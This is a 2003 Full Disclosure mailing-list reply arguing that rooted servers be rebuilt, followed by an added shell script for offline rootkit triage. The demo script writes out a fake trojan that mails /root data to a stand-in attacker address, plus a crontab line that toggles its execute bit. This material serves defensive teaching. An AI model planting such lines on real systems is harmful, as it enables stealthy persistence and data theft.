Full Disclosure mailing list archives
Re: Removing ShKit Root Kit
From: "Gregory A. Gilliss" <ggilliss () netpublishing com>
Date: Mon, 22 Dec 2003 14:59:52 -0800
A dissenting view. Okay, you (finally) figured out that your machine has been compromised (and that "finally" is, upon my word, a personal reflection of how seldom anyone is paying attention, but that's another thread). Without question, IMHO, the machine's data cannot be trusted. Back it up (for the obvious reasons that even bad data is better than no data) and plow that sucker.

Here's why - you don't know how I got in, or whether I can get back in, and while rebuilding a box takes time, the forensics will take longer. Suppose I rooted you using Apache (for example). Which module? Which page? Will a version upgrade fix it? Did I even *use* Apache (perhaps it only *looks* like Apache but in reality it's a Javascript trojan)? Again, the point is that you cannot be certain that anything is valid (checksums can be calculated by people who are smart enough to find vulnerabilities in your machine - I once figured the checksum on a binary and replaced it and tripwire was none the wiser...guess why?). You can do a version (or even a release) upgrade on the box, but unless you know for certain (and you don't) which files were compromised, you cannot know for certain that the upgrade will patch the hole. That especially goes for Windows (anyone care to do a 'dir/s/a mfc42.dll' and count how many different ones live on your box).

All this about the executable bit is nice, but when my cron job (that sets, runs, and unsets the 'x' bit on my trojan that you missed because you forgot to run find in the /dev directory, let alone check the crontabs) opens up a connection to my anonymous Yahoo account and mails me *your* changes, I will know more than you do about your box. And if I rootkitted you (which was the original thread) only a bootable CD (@stake, offmyserver and lnx-bbc.org are three that I personally use) will give you tools that *can* be trusted to determine just how rotten the box truly has been made.

People, r00t3d means "rebuild the box from known good media".
Lazy people (and I have had many, many instances of this in my personal experience) who try and "patch the box" get 0wn3d again (and again...). Plow that box!

G

On or about 2003.12.22 16:00:50 +0000, Brian Eckman (eckman () umn edu) said:

> It always will depend on the situation. Is throwing away a few million transactions acceptable, when it might take a couple of hours or less to compare the Oracle user list against a known good list? Should you scrutinize each of those millions of transactions that occurred between compromise and detection to make sure each and every one of them is legit? If doing so costs more than it is worth (define as you wish), it won't happen, and shouldn't.
-- 
Gregory A. Gilliss, CISSP                              E-mail: greg () gilliss com
Computer Security                             WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
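The post describes three things a compromised box will hide from its own tools: a trojan parked among the device nodes with its execute bit normally off, a crontab that flips the bit around each run, and binaries whose checksums have been "fixed up". The script below is an added example, not code from the post or from any of the boot CDs it names; it shows the triage pass one would run from trusted media against the suspect disk. Everything it inspects is a constructed throw-away tree (the file name `.ttyS9`, the crontab line, the mail address and the fake "binaries" are all fabricated here), the crontab locations `/var/spool/cron`, `/etc/cron.d` and `/etc/crontab` are assumed, and no real device nodes are created since that needs root.

```shell
#!/bin/sh
# Added example (not from the original post): offline triage of a suspect root
# filesystem, of the kind run from a trusted boot CD with the disk mounted read-only.
# All paths, file names and contents below are constructed for the demonstration.
set -u

# Hash with whatever the trusted media provides. Every tool used here must come from
# the CD: a rootkit that replaces sha256sum or find on the disk defeats the check.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then shasum -a 256 "$1" | cut -d' ' -f1
    else cksum "$1" | cut -d' ' -f1; fi
}

# Constructed "known good" tree standing in for the install media.
make_golden_root() {
    g=$(mktemp -d)
    mkdir -p "$g/usr/bin"
    printf 'pristine ls\n' > "$g/usr/bin/ls"
    printf 'pristine ps\n' > "$g/usr/bin/ps"
    printf '%s' "$g"
}

# Constructed compromised tree: a trojan among the device nodes with the execute bit
# off (so a find -perm for executables misses it), a crontab that toggles the bit
# around each run, and one replaced binary.
make_suspect_root() {
    s=$(mktemp -d)
    mkdir -p "$s/dev/shm" "$s/var/spool/cron/crontabs" "$s/usr/bin"
    ln -s /proc/self/fd "$s/dev/fd"
    printf '#!/bin/sh\nmail attacker@example.invalid < /root/.changes\n' > "$s/dev/.ttyS9"
    chmod 0644 "$s/dev/.ttyS9"
    printf '*/5 * * * * chmod +x /dev/.ttyS9; /dev/.ttyS9; chmod -x /dev/.ttyS9\n' \
        > "$s/var/spool/cron/crontabs/root"
    printf 'pristine ls\n' > "$s/usr/bin/ls"
    printf 'trojaned ps\n' > "$s/usr/bin/ps"
    printf '%s' "$s"
}

# Manifest of "hash  relative-path" lines built from the golden tree. The baseline
# must never be generated from, or stored on, the suspect disk.
build_manifest() {
    ( cd "$1" && find usr -type f | sort ) | while IFS= read -r rel; do
        printf '%s  %s\n' "$(hash_file "$1/$rel")" "$rel"
    done
}

# 1. Regular files under /dev. A device directory holds nodes, directories and
#    symlinks; any regular file there is worth a look regardless of its mode bits.
regular_files_in_dev() {
    find "$1/dev" -type f
}

# 2. Crontab entries that change file modes or reference anything under /dev.
suspicious_cron_lines() {
    find "$1/var/spool/cron" "$1/etc/cron.d" "$1/etc/crontab" -type f 2>/dev/null |
    while IFS= read -r f; do
        grep -nE 'chmod|/dev/' "$f" | sed "s|^|${f#"$1"}:|"
    done
}

# 3. Files under the suspect root whose hash differs from the manifest on stdin.
modified_files() {
    while read -r want rel; do
        [ "$(hash_file "$1/$rel" 2>/dev/null)" = "$want" ] || printf '%s\n' "$rel"
    done
}

golden=$(make_golden_root)
suspect=$(make_suspect_root)
build_manifest "$golden" > "$golden/manifest"

echo "== regular files under /dev";            regular_files_in_dev "$suspect"
echo "== crontab lines touching modes or /dev"; suspicious_cron_lines "$suspect"
echo "== files differing from trusted manifest"; modified_files "$suspect" < "$golden/manifest"
```

On a real engagement the manifest comes from the distribution's package metadata or a baseline taken at install time and kept off the box, and `PATH` is pointed at the CD's binaries before any of this runs; the point of the post is that nothing on the disk, hashing tools included, gets a vote.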